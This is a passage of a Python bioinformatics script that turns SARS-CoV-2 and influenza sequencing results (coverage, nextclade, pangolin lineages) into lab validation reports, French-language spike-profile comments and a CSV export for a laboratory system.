        raise argparse.ArgumentTypeError(f'readable_dir:{path} is not a valid path')

def string_asfileslist(string):
    files_list = []
    for path in string.split(','):
        if os.path.isdir(path):
            files_list.append(path)
        else:
            raise argparse.ArgumentTypeError(f'readable_dir:{path} is not a valid path')
    return files_list

def table_aslist(table, separator):
    table_list = []
    table_temp = [ x.split(separator) for x in open(table, 'r').read().replace('\r\n','\n').rstrip('\n').split('\n') ]
    for i in range(len(table_temp[0])):
        table_list.append([])
    for i in range(len(table_temp)):
        for j in range(len(table_temp[i])):
            table_list[j].append(table_temp[i][j])
    return table_list

def table_asdf(table, separator):
    table_temp = [ [ y.strip('"') for y in x.split(separator)[1:] ] for x in open(table, 'r').read().replace('\r\n','\n').rstrip('\n').split('\n')[1:] ]
    row_names = [ x.split(separator)[0] for x in open(table, 'r').read().replace('\r\n','\n').rstrip('\n').split('\n')[1:] ]
    column_names = open(table, 'r').read().replace('\r\n','\n').rstrip('\n').split('\n')[0].split(separator)[1:]
    table_df = pd.DataFrame(table_temp, columns = column_names, index=row_names)
    return table_df
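For a well-formed delimited table (first line a header, first field a row name), `table_asdf` behaves like pandas' own reader; an illustrative, self-contained sketch (the sample TSV and column names are invented for the demo):

```python
import io
import pandas as pd

# A tiny in-memory TSV: header row, then one row per sample.
tsv = "sample\tclade\tcov\ns1\t21K\t98.2\ns2\t21L\t91.0\n"

# read_csv with index_col=0 mirrors table_asdf's layout: first field becomes
# the row index, first line becomes the column names.
df = pd.read_csv(io.StringIO(tsv), sep="\t", index_col=0, dtype=str)

assert list(df.index) == ["s1", "s2"]
assert list(df.columns) == ["clade", "cov"]
assert df.loc["s1", "clade"] == "21K"
```

The hand-rolled version in the script additionally strips surrounding double quotes from every cell, which `read_csv` also does by default for quoted CSV fields.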
def filter_table(table, filter_list):
    outtable_index = []
    outtable = []
    for i in range(len(table[0])):
        if any(f for f in filter_list if f in table[0][i]):
            outtable_index.append(i)
    for i in range(len(table)):
        outtable.append([])
    for i in range(len(table)):
        for j in range(len(outtable_index)):
            outtable[i].append(table[i][outtable_index[j]])
    return outtable

def filter_dfrownames(df, filter_list, mode):
    subsample_index = []
    for i in range(len(list(df.index))):
        if len([ x for x in filter_list if x in df.index[i]]) > 0:
            subsample_index.append(list(df.index)[i])
    if mode == 'keep':
        return df.filter(items = subsample_index, axis=0)
    elif mode == 'drop':
        return df.drop(list(df.filter(items = subsample_index, axis=0).index.values))

def seek_dp(value, separator, threshold):
    value_list = [ int(x) for x in value.split(separator) if x.isdigit() ]
    if len(value_list) == 0:
        return "NA"
    elif max(value_list) >= threshold:
        return "DP"
    else:
        return "NO"
def seek_varcount(value, separator, threshold):
    #value_list = [ int(x) for x in value.split(separator) if x.isdigit() ]
    if np.isnan(value):
        return "NA"
    elif int(value) >= threshold:
        return "VARCOUNT" + str(int(value))
    else:
        return "NO"

def gen_metrics(value, separator, threshold):
    value_list = [ int(x) for x in value.split(separator) if x.isdigit() ]
    if len(value_list) == 0:
        return "NA"
    elif max(value_list) >= threshold:
        return "VARCOUNT>=" + str(threshold)
    else:
        return "NO"

def validate_column_ncov(value, criteria, separator, threshold):
    criteria_list = [ float(x) for x in criteria.split(separator) if x != 'NA' ]
    if value in ['', 'nan'] and min(criteria_list) > threshold:
        return "ABSCLADE"
    elif len(criteria_list) == 0:
        return "ININT"
    elif min(criteria_list) < threshold:
        return "ININT"
    else:
        return value

def validate_column_fluabv(value, criteria1, criteria2, separator, threshold, qc):
    criteria1_list = [ float(x) for x in criteria1.split(separator) if x != 'NA' ]
    criteria2_list = [ float(x) for x in criteria2.split(separator) if x != 'NA' ]
    if qc not in ['good', 'mediocre']:
        return "ININT"
    elif value in ['', 'nan'] and min(criteria1_list) > threshold and min(criteria2_list) > threshold:
        return "ABSCLADE"
    elif len(criteria1_list) == 0 or len(criteria2_list) == 0:
        return "ININT"
    elif min(criteria1_list) < threshold or min(criteria2_list) < threshold:
        return "ININT"
    else:
        return value

def list_position(value, valuesep, rangesep):
    if value == '' or value == 'nan':
        poslist = []
    else:
        poslist = []
        rangelist = [ x for x in value.split(rangesep) ]
        for x in rangelist:
            poslist.append(range(int(x.split(valuesep)[0]),int(x.split(valuesep)[-1])+1))
        poslist = [pos for plist in poslist for pos in plist]
    return poslist
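A minimal sketch of the range expansion performed by `list_position` (function name is illustrative): a nextclade-style missing-positions string such as `"21987-21995,22200"` is turned into a flat list of integer genome positions, single positions included.

```python
def expand_ranges(value, valuesep="-", rangesep=","):
    positions = []
    if value in ("", "nan"):
        return positions
    for chunk in value.split(rangesep):
        bounds = chunk.split(valuesep)
        # A lone position like "22200" has identical first and last bounds,
        # so the inclusive range still yields exactly that one position.
        positions.extend(range(int(bounds[0]), int(bounds[-1]) + 1))
    return positions


assert expand_ranges("10-12,20") == [10, 11, 12, 20]
assert expand_ranges("nan") == []
```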
def list_intersect(containedl, containingl, mode, threshold):
    foundpos = [ str(x) for x in containedl if x in containingl ]
    if mode == 'match':
        return ';'.join(foundpos)
    elif mode == 'missing':
        return ';'.join([ x for x in containedl if x not in containingl ])
    nbcontained = len(containingl)-len(foundpos)
    perccontained = nbcontained/len(containingl)
    if mode == 'include':
        criteria = perccontained
    elif mode == 'exclude':
        criteria = 100-perccontained
    if criteria < threshold:
        return "NO"
    else:
        return "YES"

def match_submatrix_ncov(lineage, clade, header, mode):
    if len([ x for x in header[4:] if len(x.split('_'))!= 3 ]) > 0:
        sys.exit("submatrix seems to be malformed : " + ';'.join([ x for x in header[4:] if len(x.split('_'))!= 3 ]))
    header_clade = [ x.split('_')[0] for x in header]
    header_comment_temp = [ x.split('_')[1] if len(x.split('_'))== 3 else 'NA' for x in header]
    header_comment = [ x if x!='' else 'Lignage non surveille par Sante Publique France' for x in header_comment_temp]
    header_lineage = [ x.split('_')[-1] for x in header]
    if lineage in header_lineage:
        if mode == 'match':
            return lineage
        if mode == 'index':
            return header_lineage.index(lineage)
        if mode == 'comment':
            return header_comment[header_lineage.index(lineage)]
    elif '.'.join(lineage.split('.')[0:-1]) in header_lineage and '.'.join(lineage.split('.')[0:-1]) not in ['','A','B','C']:
        if mode == 'match':
            return '.'.join(lineage.split('.')[0:-1])
        if mode == 'index':
            return header_lineage.index('.'.join(lineage.split('.')[0:-1]))
        if mode == 'comment':
            return header_comment[header_lineage.index('.'.join(lineage.split('.')[0:-1]))]
    elif '.'.join(lineage.split('.')[0:-2]) in header_lineage and '.'.join(lineage.split('.')[0:-2]) not in ['','A','B','C']:
        if mode == 'match':
            return '.'.join(lineage.split('.')[0:-2])
        if mode == 'index':
            return header_lineage.index('.'.join(lineage.split('.')[0:-2]))
        if mode == 'comment':
            return header_comment[header_lineage.index('.'.join(lineage.split('.')[0:-2]))]
    elif '.'.join(lineage.split('.')[0:-3]) in header_lineage and '.'.join(lineage.split('.')[0:-3]) not in ['','A','B','C']:
        if mode == 'match':
            return '.'.join(lineage.split('.')[0:-3])
        if mode == 'index':
            return header_lineage.index('.'.join(lineage.split('.')[0:-3]))
        if mode == 'comment':
            return header_comment[header_lineage.index('.'.join(lineage.split('.')[0:-3]))]
    elif clade in header_clade:
        if mode == 'match':
            return clade
        if mode == 'index':
            return header_clade.index(clade)
        if mode == 'comment':
            return header_comment[header_clade.index(clade)]
    else:
        if mode == 'match':
            return 'NA'
        if mode == 'index':
            return header_clade.index('ININT')
        if mode == 'comment':
            return ''
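The repeated `elif` arms in `match_submatrix_ncov` implement one idea: strip the Pango lineage one dot-level at a time (up to three levels) until it matches a lineage known to the substitution matrix. An illustrative generalization (names and the sample `known` list are invented for the demo, and the real function additionally falls back to the nextclade clade):

```python
def match_lineage(lineage, known, max_strip=3):
    parts = lineage.split(".")
    for strip in range(0, max_strip + 1):
        candidate = ".".join(parts[: len(parts) - strip]) if strip else lineage
        # Truncated forms must not collapse to a bare root ('', 'A', 'B', 'C'),
        # mirroring the exclusions in the script.
        if candidate in known and candidate not in ("", "A", "B", "C"):
            return candidate
    return "NA"


known = ["BA.5", "BQ.1.1"]
assert match_lineage("BA.5.2.1", known) == "BA.5"     # matched after 2 strips
assert match_lineage("BQ.1.1", known) == "BQ.1.1"     # exact match
assert match_lineage("XBB.1.5", known) == "NA"        # no ancestor known
```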
def match_submatrix_fluabv(lineage, clade, header, mode):
    if len([ x for x in header[4:] if len(x.split('_'))!= 3 ]) > 0:
        sys.exit("submatrix seems to be malformed : " + ';'.join([ x for x in header[4:] if len(x.split('_'))!= 3 ]))
    header_clade = [ x.split('_')[0] for x in header]
    header_comment_temp = [ x.split('_')[1] if len(x.split('_'))== 3 else 'NA' for x in header]
    header_comment = [ x if x!='' else '' for x in header_comment_temp]
    if clade in header_clade:
        if mode == 'match':
            return clade
        if mode == 'index':
            return header_clade.index(clade)
        if mode == 'comment':
            return header_comment[header_clade.index(clade)]
    elif '/'.join(clade.split('/')[0:-1]) in header_clade:
        if mode == 'match':
            return '/'.join(clade.split('/')[0:-1])
        if mode == 'index':
            return header_clade.index('/'.join(clade.split('/')[0:-1]))
        if mode == 'comment':
            return header_comment[header_clade.index('/'.join(clade.split('/')[0:-1]))]
    else:
        if mode == 'match':
            return 'NA'
        if mode == 'index':
            return header_clade.index('ININT')
        if mode == 'comment':
            return ''

def seek_expectedprofile_ncov(poslist, aasub):
    expectedprofile = []
    for i in range(1,len(poslist)):
        if aasub[i] != '':
            expectedprofile.append('S:' + poslist[i] + aasub[i])
    return expectedprofile

def seek_expectedprofile_fluabv(poslist, aasub):
    expectedprofile = []
    for i in range(1,len(poslist)):
        if aasub[i] != '':
            expectedprofile.append(poslist[i] + aasub[i])
    return expectedprofile

def seek_nocovsub_ncov(poslist, missingpos):
    expectedpos_nucl = [ [(int(''.join(filter(str.isdigit, x))))*3-2+21562,(int(''.join(filter(str.isdigit, x))))*3-1+21562,(int(''.join(filter(str.isdigit, x))))*3+21562] for x in poslist[1:] ]
    expectedpos = [ x for x in poslist[1:] ]
    nocovsub = []
    for i in range(len(expectedpos)):
        if expectedpos_nucl[i][0] in missingpos or expectedpos_nucl[i][1] in missingpos or expectedpos_nucl[i][2] in missingpos:
            nocovsub.append(expectedpos[i])
    return nocovsub
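The coordinate arithmetic inside `seek_nocovsub_ncov` maps a Spike amino-acid position N to its three genome nucleotides, `21562 + 3N - 2` through `21562 + 3N`, where 21562 is the script's offset for the Spike ORF (which starts at genome position 21563). A substitution is uncallable if any of its three codon bases falls in the uncovered set. A standalone sketch (`spike_codon` is an illustrative helper name):

```python
def spike_codon(aa_pos, orf_offset=21562):
    # First base of the codon for amino acid aa_pos in the Spike ORF.
    first = orf_offset + 3 * aa_pos - 2
    return [first, first + 1, first + 2]


# Spike amino acid 1 occupies the first codon of the ORF.
assert spike_codon(1) == [21563, 21564, 21565]
# The well-known S:D614G change sits in the codon at genome 23402-23404.
assert spike_codon(614) == [23402, 23403, 23404]

# A position is "no coverage" if any codon base is missing:
missing = set(range(23400, 23403))
assert any(base in missing for base in spike_codon(614))
```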
def seek_nocovsub_fluabv(poslist, missingpos):
    expectedpos_nucl = [ [(int(''.join(filter(str.isdigit, x))))*3-2+21562,(int(''.join(filter(str.isdigit, x))))*3-1+21562,(int(''.join(filter(str.isdigit, x))))*3+21562] for x in poslist[1:] ]
    expectedpos = [ x for x in poslist[1:] ]
    nocovsub = []
    for i in range(len(expectedpos)):
        if expectedpos_nucl[i][0] in missingpos or expectedpos_nucl[i][1] in missingpos or expectedpos_nucl[i][2] in missingpos:
            nocovsub.append(expectedpos[i])
    return nocovsub

def seek_insertion_ncov(insstring):
    inslist = [ x for x in insstring.split(',') if x not in ['', 'nan'] ]
    insertions = []
    for i in range(0, len(inslist)):
        if inslist[i] == '22204:GAGCCAGAA':
            insertions.append('S:ins214EPE')
        elif int(inslist[i].split(':')[0]) in list_nucrbd:
            insertions.append('S:ins' + inslist[i].split(':')[0] + inslist[i].split(':')[1])
            insertions.append('S:insAVISBIO')
    return ','.join(insertions)

def seek_insertion_fluabv(insstring):
    inslist = [ x for x in insstring.split(',') if x not in ['', 'nan'] ]
    insertions = []
    for i in range(0, len(inslist)):
        insertions.append('Ins' + inslist[i].split(':')[0] + ':' + inslist[i].split(':')[1])
        insertions.append('S:insAVISBIO')
    return ','.join(insertions)

def validate_result_ncov(nextclade, dp, varcount, hasposc, val_nocovsub, val_missingsub):
    result = ''
    nocovsubpos = [ int(x[1:]) for x in val_nocovsub ]
    if nextclade == 'ININT':
        if hasposc == 'FAILED':
            return 'REPASSE CI FAILED'
        else:
            return 'ININT'
    else:
        result = nextclade
    if (dp != 'NO' and dp != 'NA') or (varcount != 'NO' and varcount != 'NA'):
        result += '_REPASSE'
    if dp != 'NO' and dp != 'NA':
        result += '_' + dp
    if varcount != 'NO' and varcount != 'NA':
        result += '_' + varcount
    if [ x for x in val_missingsub.split(';') if x.lstrip('S:')[:-1] not in [''] ] != []:
        result += '_AVIS BIO'
    elif len(list_intersect(nocovsubpos, list_aarbm, 'match', 100)) > 0:
        result += '_AVIS BIO'
    result += ' ' + args.nextcladeversion
    return result

def validate_result_fluabv(nextclade, dp, varcount, hasposc, val_nocovsub, val_missingsub):
    result = ''
    nocovsubpos = [ int(x[1:]) for x in val_nocovsub ]
    if nextclade == 'ININT':
        if hasposc == 'FAILED':
            return 'REPASSE CI FAILED'
        else:
            return 'ININT'
    else:
        result = datatype + ' - Clade ' + nextclade
    if (dp != 'NO' and dp != 'NA') or (varcount != 'NO' and varcount != 'NA'):
        result += '_REPASSE'
    if dp != 'NO' and dp != 'NA':
        result += '_' + dp
    if varcount != 'NO' and varcount != 'NA':
        result += '_' + varcount
    result += ' ' + args.nextcladeversion
    return result
def gen_commentary_ncov(classmatch, substitutions, deletions, insertions, nocovsub, comment, atypicsub, atypicindel):
    if classmatch == 'ININT':
        return 'DSC'
    commentary = 'Profil de la spike : '
    commentary += ';'.join(substitutions)
    if len(deletions) > 0:
        commentary += '|' + ';'.join(deletions)
    if len(insertions) > 0:
        commentary += '|' + ';'.join(insertions)
    if nocovsub != []:
        nocovsubpos = [ int(x[1:]) for x in nocovsub ]
        if len(list_intersect(nocovsubpos, list_aarbm, 'match', 100)) > 0:
            commentary += " ~ Rendu sous reserve compte tenu de(s) position(s) d'interet suivante(s) non couvertes sur la spike : " + ';'.join(nocovsub)
        else:
            commentary += " ~ Position(s) d'interet suivante(s) non couvertes sur la spike : " + ';'.join(nocovsub)
    commentary += " ~ " + comment + " (" + submatrix_version[4:] + "." + submatrix_version[2:4] + "." + submatrix_version[0:2] + ")"
    if (atypicsub != [''] or atypicindel != ['']) and classmatch not in list_submatrix_header_clade:
        commentary += " ~ Profil atypique :"
        if atypicsub != ['']:
            commentary += " substitution(s) " + ";".join(atypicsub) + " presente(s) sur le RBD"
        if atypicsub != [''] and atypicindel != ['']:
            commentary += " -"
        if atypicindel != ['']:
            commentary += " indel(s) " + ";".join(atypicindel) + " present(s)"
    elif classmatch not in list_submatrix_header_clade:
        commentary += " ~ Profil typique du RBD"
    commentary += '.'
    return commentary

def gen_commentary_fluabv(classmatch, substitutions, deletions, insertions, nocovsub, comment, atypicsub, atypicindel):
    if classmatch == 'ININT':
        return 'DSC'
    commentary = "Profil des positions d'interet de S4 : "
    commentary += ';'.join(substitutions)
    if len(deletions) > 0:
        commentary += '|' + ';'.join(deletions)
    if len(insertions) > 0:
        commentary += '|' + ';'.join(insertions)
    if nocovsub != []:
        nocovsubpos = [ int(x[1:]) for x in nocovsub ]
        commentary += " ~ Position(s) d'interet suivante(s) non couvertes sur HA : " + ';'.join(nocovsub)
    if comment != '':
        commentary += " ~ " + comment + " (" + submatrix_version[4:] + "." + submatrix_version[2:4] + "." + submatrix_version[0:2] + ")"
    if (atypicsub != [''] or atypicindel != ['']) and classmatch not in list_submatrix_header_clade:
        commentary += " ~ Profil atypique :"
        if atypicsub != ['']:
            commentary += " substitution(s) " + ";".join(atypicsub) + " presente(s) sur HA"
        if atypicsub != [''] and atypicindel != ['']:
            commentary += " -"
        if atypicindel != ['']:
            commentary += " indel(s) " + ";".join(atypicindel) + " present(s)"
    elif classmatch not in list_submatrix_header_clade:
        commentary += " ~ Profil typique"
    commentary += '.'
    return commentary
parser = argparse.ArgumentParser(description='Generate a validation report from seqmet files')
debugmode = parser.add_mutually_exclusive_group()
debugmode.add_argument('-v', '--verbose', action='store_true')
debugmode.add_argument('-q', '--quiet', action='store_true')
parser.add_argument('--version', action='version', version='0.0.3')
parser.add_argument('-r', '--rundate', help='rundate prefix')
depthdata = parser.add_mutually_exclusive_group()
depthdata.add_argument('-d', '--depthfiledir', help='the base', type=path_asfileslist)
depthdata.add_argument('-l', '--depthfilelist', help='the base', type=string_asfileslist)
parser.add_argument('-s', '--summary', help='the base')
parser.add_argument('-n', '--nextclade', help='the base')
parser.add_argument('-p', '--pangolin', help='the base')
parser.add_argument('-x', '--nextcladeversion', help='the base')
parser.add_argument('-t', '--vartable', help='the base')
parser.add_argument('-m', '--submatrix', help='the base')
parser.add_argument('--mode', help='the base')
parser.add_argument('--varcount_threshold', type=int, default=13, help='the base')
parser.add_argument('--dp_threshold', type=int, default=6, help='the base')
parser.add_argument('--cov_minok', type=int, default=90, help='the base')
parser.add_argument('--cov_maxneg', type=int, default=5, help='the base')
parser.add_argument('--error_plate', default='', help='the base')
parser.add_argument('-o', '--outdir', help='output files to specified dir', default='./')
if __name__ == '__main__':
    args = parser.parse_args()
    if args.mode == 'ncov':
        run_date = args.rundate
        datatype = args.submatrix.split('_')[1]
        submatrix_version = args.submatrix.split('-')[-1].split('.')[0]
        df_var = table_asdf(args.vartable, '\t')
        df_var = df_var.apply(pd.to_numeric, errors='coerce').fillna(df_var)
        df_summary = table_asdf(args.summary, '\t')
        df_nextclade = table_asdf(args.nextclade, '\t')
        df_pangolin = table_asdf(args.pangolin, ',')
        df_submatrix = table_asdf(args.submatrix, '\t')
        list_submatrix = table_aslist(args.submatrix, '\t')
        list_submatrix_header = [ x[0] for x in table_aslist(args.submatrix, '\t') ]
        list_submatrix_header_clade = [ x[0].split('_')[0] for x in table_aslist(args.submatrix, '\t') ]
        list_submatrix_header_lineage = [ x[0].split('_')[-1] for x in table_aslist(args.submatrix, '\t') ]
        list_aarbd = range(333,528)
        list_aarbm = range(438,507)
        list_nucrbd = range(21563,25386)
        list_nucrbm = range(22874,23081)
        list_errorplate = args.error_plate.split(',')
        df_validation = pd.concat([df_summary.add_prefix('summary_'), df_nextclade.add_prefix('nextclade_'), df_pangolin.add_prefix('pangolin_')], axis=1)
        df_validation['val_dp'] = df_validation.apply(lambda x : seek_dp(x.summary_hasdp, '//', args.dp_threshold) , axis=1)
        df_validation['val_varcount'] = df_validation[['summary_10-20%', 'summary_20-50%']].apply(lambda x: pd.to_numeric(x, errors='coerce')).sum(axis = 1, skipna = False, min_count=2).apply(lambda x : seek_varcount(x, '//', args.varcount_threshold))
        df_validation['val_plate'] = df_validation.apply(lambda x : x.name.split('-')[0] , axis=1)
        df_validation['val_sampleid'] = df_validation.apply(lambda x : x.name.split('-')[1].split('_')[0] , axis=1)
        df_validation['val_platewell'] = df_validation.apply(lambda x : x.name.split('_')[-1] , axis=1)
        df_validation['val_nextclade'] = df_validation.apply(lambda x : validate_column_ncov(x.nextclade_clade, x.summary_percCOV, ';', args.cov_minok) , axis=1)
        df_validation['val_pangolin'] = df_validation.apply(lambda x : validate_column_ncov(x.pangolin_lineage, x.summary_percCOV, ';', args.cov_minok) , axis=1)
        df_validation['stat_missingpos'] = df_validation.apply(lambda x : list_position(str(x.nextclade_missing), '-', ',') , axis=1)
        df_validation['val_rbmcovered'] = df_validation.apply(lambda x : list_intersect(x.stat_missingpos, list_nucrbm, 'exclude', 100) , axis=1)
        df_validation['val_classmatch'] = df_validation.apply(lambda x : match_submatrix_ncov(x.val_pangolin, x.val_nextclade, list_submatrix_header, "match") , axis=1)
        df_validation['val_classindex'] = df_validation.apply(lambda x : match_submatrix_ncov(x.val_pangolin, x.val_nextclade, list_submatrix_header, "index") , axis=1)
        df_validation['val_classcomment'] = df_validation.apply(lambda x : match_submatrix_ncov(x.val_pangolin, x.val_nextclade, list_submatrix_header, "comment") , axis=1)
        df_validation['val_insertions'] = df_validation.apply(lambda x : seek_insertion_ncov(str(x.nextclade_insertions)) , axis=1)
        df_validation['val_expectedprofile'] = df_validation.apply(lambda x : seek_expectedprofile_ncov(list_submatrix[0], list_submatrix[int(x.val_classindex)]) , axis=1)
        df_validation['val_nocovsub'] = df_validation.apply(lambda x : seek_nocovsub_ncov(list_submatrix[0], x.stat_missingpos) , axis=1)
        df_validation['val_missingsub'] = df_validation.apply(lambda x : list_intersect(x.val_expectedprofile, [y for y in (str(x.nextclade_aaSubstitutions) + "," + str(x.nextclade_aaDeletions) + "," + str(x.val_insertions)).split(',')], 'missing', 100) , axis=1)
        df_validation['val_atypicsub'] = df_validation.apply(lambda x : list_intersect([y for y in (str(x.nextclade_aaSubstitutions)).split(',') if y[0:2] == 'S:' and (int(''.join(filter(str.isdigit, y)))) in list_aarbd and y not in ['', 'nan']], x.val_expectedprofile, 'missing', 100) , axis=1)
        df_validation['val_atypicindel'] = df_validation.apply(lambda x : list_intersect([y for y in (str(x.nextclade_aaDeletions) + "," + str(x.val_insertions)).split(',') if y[0:2] == 'S:' and y != 'S:ins214EPE' and y not in ['', 'nan']], x.val_expectedprofile, 'missing', 100) , axis=1)
        df_validation['val_result'] = df_validation.apply(lambda x : validate_result_ncov(x.val_nextclade, x.val_dp, x.val_varcount, x.summary_hasposc, x.val_nocovsub, x.val_missingsub) , axis=1)
        df_validation['val_commentary'] = df_validation.apply(lambda x : gen_commentary_ncov(x.val_classmatch, [y for y in str(x.nextclade_aaSubstitutions).split(',') if y[0:2] == 'S:' and y not in ['', 'nan']], [y for y in str(x.nextclade_aaDeletions).split(',') if y[0:2] == 'S:' and y not in ['', 'nan']], [y for y in str(x.val_insertions).split(',') if y[0:2] == 'S:' and y not in ['', 'nan']], x.val_nocovsub, x.val_classcomment, x.val_atypicsub.split(';'), x.val_atypicindel.split(';')), axis=1)
        df_validation['val_error'] = df_validation.apply(lambda x : 'ERROR' if x.val_plate in list_errorplate else "OK", axis=1)
        df_validation['stat_simpleprofile'] = df_validation.apply(lambda x : x.val_nextclade + ' - ' + x.val_atypicsub , axis=1)
        df_var_major = filter_dfrownames(df_var, ['|MAJOR'], 'keep')
        df_var_major_indel = filter_dfrownames(df_var_major, ['|DEL|', '|INS|', '|COMPLEX|'], 'keep')
        df_validation_sample = filter_dfrownames(df_validation, ['Tpos', 'PCR', 'NT', 'Neg', 'neg', 'T-', 'TVide', 'Tvide'], 'drop')
        df_validation_control = filter_dfrownames(df_validation, ['Tpos', 'PCR', 'NT', 'Neg', 'neg', 'T-', 'TVide', 'Tvide'], 'keep')
        df_validation_nt = filter_dfrownames(df_validation, ['NT', 'PCR', 'Neg', 'neg', 'T-', 'TVide', 'Tvide'], 'keep')
        df_validation_20a = filter_dfrownames(df_validation, ['TposPl'], 'keep')
        df_validation_20j = filter_dfrownames(df_validation, ['TposV3'], 'keep')
        df_validation_19b = filter_dfrownames(df_validation, ['Tpos19B'], 'keep')
        df_var_major_indel[df_var_major_indel > 0].count(axis=1).to_csv(args.outdir + run_date + '_' + datatype + '_indel.tsv', sep='\t', index_label='variant', header=["count"])
        df_validation_control[['summary_percCOV', 'nextclade_clade', 'nextclade_totalAminoacidSubstitutions']].replace(r'^\s*$', np.nan, regex=True).fillna('ININT').to_csv(args.outdir + run_date + '_' + datatype + '_control.tsv', sep='\t', index_label='control')
        df_validation_sample['stat_simpleprofile'].value_counts().sort_index(axis = 0).to_csv(args.outdir + run_date + '_' + datatype + '_runsummary.tsv', sep='\t', index_label='Clade')
        df_metrics = pd.concat([
            df_validation_sample[df_validation_sample['summary_percCOV'].apply(pd.to_numeric, errors='coerce') < args.cov_minok]['val_plate'].value_counts(),
            df_validation_sample.loc[(~df_validation_sample['val_dp'].isin(['NO','NA'])) & (~df_validation_sample['val_commentary'].isin(['DSC','NA']))]['val_plate'].value_counts(),
            df_validation_sample.loc[(~df_validation_sample['val_varcount'].isin(['NO','NA'])) & (~df_validation_sample['val_commentary'].isin(['DSC','NA']))]['val_plate'].value_counts(),
df_validation_sample[df_validation_sample['summary_hasposc'].isin(['FAILED'])]['val_plate'].value_counts(),
df_validation_nt[df_validation_nt['summary_percCOV'].apply(pd.to_numeric, errors='coerce') >= args.cov_maxneg]['val_plate'].value_counts(),
df_validation_20a.loc[(df_validation_20a['nextclade_clade'].isin(['20A'])) & (df_validation_20a['nextclade_totalAminoacidSubstitutions'].apply(pd.to_numeric, errors='coerce') <= 6.0)]['val_plate'].value_counts().add(df_validation_20j[df_validation_20j['nextclade_clade'].isin(['20J (Gamma, V3)'])]['val_plate'].value_counts(), fill_value=0).add(df_validation_19b[df_validation_19b['nextclade_clade'].isin(['19B'])]['val_plate'].value_counts(), fill_value=0)],axis=1).fillna(0).astype(int)
df_metrics.columns = ['sample_cov<=' + str(args.cov_minok), 'sample_dp>=' + str(args.dp_threshold), 'sample_varcount>=' + str(args.varcount_threshold), 'sample_ci_failed', 'tneg_cov>=' + str(args.cov_maxneg), 'tpos_ok']
df_metrics.sort_index(axis = 0).to_csv(args.outdir + run_date + '_' + datatype + '_metric.tsv', sep='\t', index_label='plate')
pd.concat([df_validation[df_validation.filter(regex='summary_').columns], df_validation[df_validation.filter(regex='val_').columns], df_validation[df_validation.filter(regex='nextclade_').columns], df_validation[df_validation.filter(regex='pangolin_').columns]], axis=1).to_csv(args.outdir + run_date + '_' + datatype + '_validation.tsv', sep='\t', index_label='SampleID')
df_export = pd.DataFrame(df_validation, columns = ['val_sampleid'])
df_export['Instrument ID(s)'] = "NB552333"
df_export['Analysis authorized by'] = "laurence.josset@chu-lyon.fr"
df_export['AssayResultTargetCode'] = "SeqArt"
df_export['Target_1_cq'] = df_validation.apply(lambda x : x.val_result.replace(',',';') if x.val_error != 'ERROR' else 'ERREUR-' + x.val_result.replace(',',';'), axis=1)
df_export['Target_2_cq'] = df_validation.apply(lambda x : x.val_pangolin.replace(',',';') if x.val_error != 'ERROR' else 'ERREUR-' + x.val_pangolin.replace(',',';'), axis=1)
df_export['Target_3_cq'] = df_validation.apply(lambda x : x.val_commentary.replace(',',';') if x.val_error != 'ERROR' else 'ERREUR-' + x.val_commentary.replace(',',';'), axis=1)
df_export.rename(columns={df_export.columns[0]: 'Sample ID'}).to_csv(args.outdir + run_date + '_' + datatype + '_fastfinder.csv', sep=',', index = False)
if args.mode == 'fluabv':
run_date = args.rundate
datatype = args.submatrix.split('_')[1]
submatrix_version = args.submatrix.split('-')[-1].split('.')[0]
df_var = table_asdf(args.vartable, '\t')
df_var = df_var.apply(pd.to_numeric, errors='coerce').fillna(df_var)
df_summary = table_asdf(args.summary, '\t')
df_nextclade = table_asdf(args.nextclade, '\t')
df_submatrix = table_asdf(args.submatrix, '\t')
list_submatrix = table_aslist(args.submatrix, '\t')
list_submatrix_header = [ x[0] for x in table_aslist(args.submatrix, '\t') ]
list_submatrix_header_clade = [ x[0].split('_')[0] for x in table_aslist(args.submatrix, '\t') ]
list_submatrix_header_lineage = [ x[0].split('_')[-1] for x in table_aslist(args.submatrix, '\t') ]
list_profile_base = table_aslist(args.submatrix, '\t')[0][1:]
df_validation = pd.concat([df_summary.add_prefix('summary_'), df_nextclade.add_prefix('nextclade_')], axis=1)
df_validation['val_dp'] = df_validation.apply(lambda x : seek_dp(x.summary_hasdp, '//', args.dp_threshold) , axis=1)
df_validation['val_varcount'] = df_validation[['summary_10-20%', 'summary_20-50%']].apply(lambda x: pd.to_numeric(x, errors='coerce')).sum(axis = 1, skipna = False, min_count=2).apply(lambda x : seek_varcount(x, '//', args.varcount_threshold))
df_validation['val_plate'] = df_validation.apply(lambda x : x.name.split('-')[0] , axis=1)
df_validation['val_sampleid'] = df_validation.apply(lambda x : x.name.split('-')[1].split('_')[0] , axis=1)
df_validation['val_platewell'] = df_validation.apply(lambda x : x.name.split('_')[-1] , axis=1)
df_validation['val_nextclade'] = df_validation.apply(lambda x : validate_column_fluabv(x.nextclade_clade, x.summary_PercCOV_S4, x.summary_PercCOV_S6, ';', args.cov_minok, x['nextclade_qc.overallStatus']) , axis=1)
df_validation['stat_missingpos'] = df_validation.apply(lambda x : list_position(str(x.nextclade_missing), '-', ',') , axis=1)
df_validation['val_classmatch'] = df_validation.apply(lambda x : match_submatrix_fluabv('', x.val_nextclade, list_submatrix_header, "match") , axis=1)
df_validation['val_classindex'] = df_validation.apply(lambda x : match_submatrix_fluabv('', x.val_nextclade, list_submatrix_header, "index") , axis=1)
df_validation['val_classcomment'] = df_validation.apply(lambda x : match_submatrix_fluabv('', x.val_nextclade, list_submatrix_header, "comment") , axis=1)
df_validation['val_insertions'] = df_validation.apply(lambda x : seek_insertion_fluabv(str(x.nextclade_insertions)) , axis=1)
df_validation['val_expectedprofile'] = df_validation.apply(lambda x : seek_expectedprofile_fluabv(list_submatrix[0], list_submatrix[int(x.val_classindex)]) , axis=1)
df_validation['val_nocovsub'] = df_validation.apply(lambda x : seek_nocovsub_fluabv(list_submatrix[0], x.stat_missingpos) , axis=1)
df_validation['val_missingsub'] = df_validation.apply(lambda x : list_intersect(x.val_expectedprofile, [y for y in (str(x.nextclade_aaSubstitutions) + "," + str(x.nextclade_aaDeletions) + "," + str(x.val_insertions)).split(',') if y not in ['', 'nan']], 'missing', 100) , axis=1)
df_validation['val_atypicsub'] = df_validation.apply(lambda x : list_intersect([y for y in (str(x.nextclade_aaSubstitutions)).split(',') if y not in ['', 'nan']], x.val_expectedprofile, 'missing', 100) , axis=1)
